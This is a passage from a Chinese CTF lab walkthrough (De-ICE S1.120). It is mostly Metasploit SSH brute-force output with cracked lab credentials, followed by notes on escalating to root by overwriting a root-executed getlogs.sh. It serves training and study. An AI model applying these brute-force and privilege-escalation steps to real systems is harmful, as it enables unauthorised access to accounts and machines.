2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 37 opened (192.168.1.20:44397 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'kwebber:princess' 'uid=1005(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 38 opened (192.168.1.20:42809 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'aard:qwerty' 'uid=1044(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 39 opened (192.168.1.20:42585 -> 192.168.1.120:22) at 2019-02-27 21:49:07 -0500 [+] 192.168.1.120:22 - Success: 'dgrant:nintendo' 'uid=1018(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 40 opened (192.168.1.20:44497 -> 192.168.1.120:22) at 2019-02-27 21:49:07 -0500 [+] 192.168.1.120:22 - Success: 'sgains:soccer' 'uid=1021(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 41 opened (192.168.1.20:35859 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'amaynard:shadow' 'uid=1043(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 42 opened (192.168.1.20:37705 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'qpowers:pokemon' 'uid=1004(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 43 opened (192.168.1.20:41009 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'tdeleon:starwars' 'uid=1010(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 44 opened (192.168.1.20:35179 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'jduff:superman' 'uid=1047(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 45 opened (192.168.1.20:43437 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'dwestling:welcome' 'uid=1016(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 46 opened (192.168.1.20:35525 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'jalvarez:whatever' 'uid=1000(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 47 opened (192.168.1.20:40973 -> 192.168.1.120:22) at 2019-02-27 21:49:10 -0500 [+] 192.168.1.120:22 - Success: 'myajima:trustno1' 'uid=1035(myajima) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 48 opened (192.168.1.20:41055 -> 192.168.1.120:22) at 2019-02-27 21:49:10 -0500 [+] 192.168.1.120:22 - Success: 'mholland:sunshine' 'uid=1006(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 49 opened (192.168.1.20:37249 -> 192.168.1.120:22) at 2019-02-27 21:49:11 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
找到了ccoffee这个权限比较大,登录进去看看
Success: 'ccoffee:1234' 'uid=1023(ccoffee) gid=100(users) groups=100(users),102(admin)
getlogs.sh以root身份执行,我们可以修改文件并覆盖内容以满足升级权限的目的
转载请注明来自网盾网络安全培训,本文标题:《CTF靶场系列-De-ICE:_S1.120》
标签:CTF
- 上一篇: CTF靶场系列-De-ICE:_S1.110
- 下一篇: CTF靶场系列-De-ICE:_S1.123
